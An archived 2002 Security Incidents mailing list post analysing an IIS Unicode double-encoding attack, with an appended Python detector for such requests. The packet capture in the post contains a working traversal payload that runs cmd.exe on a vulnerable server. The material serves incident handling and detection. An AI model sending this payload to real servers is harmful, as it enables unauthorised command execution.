Security Incidents mailing list archives

Re: Unicode worm?


From: pj () esec dk
Date: Fri, 23 Aug 2002 13:43:25 +0200


I think the single-request attack you describe corresponds to this payload:

06/17/02-18:12:39.590684 192.84.105.44:2468 -> X.X.X.X:80
TCP TTL:108 TOS:0x0 ID:3615 IpLen:20 DgmLen:99 DF
***AP*** Seq: 0xC14916B  Ack: 0xC6B3FB9C  Win: 0x40B0  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 35 63 25 32 35 35 63 2E 2E 2F 77 69 6E 6E  255c%255c../winn
74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65  t/system32/cmd.e
78 65 3F 2F 63 2B 64 69 72 0D 0A                 xe?/c+dir..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

If Unicode translation is applied, %255c%255c is seen as %5c%%5c.

This request is sent by the unicode option of the sfind.exe tool. Sfind.exe
originates from China; I have seen it used in different toolkits for
semi-automated establishment of Warez "FXP" servers on vulnerable IIS
servers, see http://www.esec.dk/pubstro.pdf

best regards
Peter Jelver
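Added example, not part of Peter's message: a small Python detector that percent-decodes a request target repeatedly until it stops changing, showing why a single decoding pass misses the %255c form and why the traversal only becomes visible after the second pass. The sample request line is transcribed from the capture above; the function names are my own.

```python
import urllib.parse

# Sample request line, transcribed from the hex dump in the capture above.
SAMPLE_REQUEST = "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"


def decode_fully(path: str, max_rounds: int = 4):
    """Percent-decode until the string stops changing.

    Returns (decoded_string, rounds_that_changed_it). A single
    urllib.parse.unquote() turns %255c into %5c and stops there, which is
    exactly the gap a double-encoded request relies on.
    """
    rounds = 0
    current = path
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(current)
        if decoded == current:
            break
        current = decoded
        rounds += 1
    return current, rounds


def _has_traversal(path: str) -> bool:
    # IIS treats backslash as a path separator, so normalise it first.
    normalised = path.replace("\\", "/")
    return "/../" in normalised or normalised.startswith("../")


def classify_request(request_line: str) -> dict:
    """Return traversal indicators for one HTTP request line."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else request_line
    decoded, rounds = decode_fully(target)
    return {
        "decoded": decoded,
        "decode_rounds": rounds,
        # what a naive single-pass decoder would conclude
        "single_pass_traversal": _has_traversal(urllib.parse.unquote(target)),
        # what a full decoder concludes
        "traversal": _has_traversal(decoded),
        "double_encoded": rounds >= 2,
    }
```

Running classify_request on SAMPLE_REQUEST reports no traversal after one pass but a traversal after two, which is the signal a log-based detector should key on.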


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

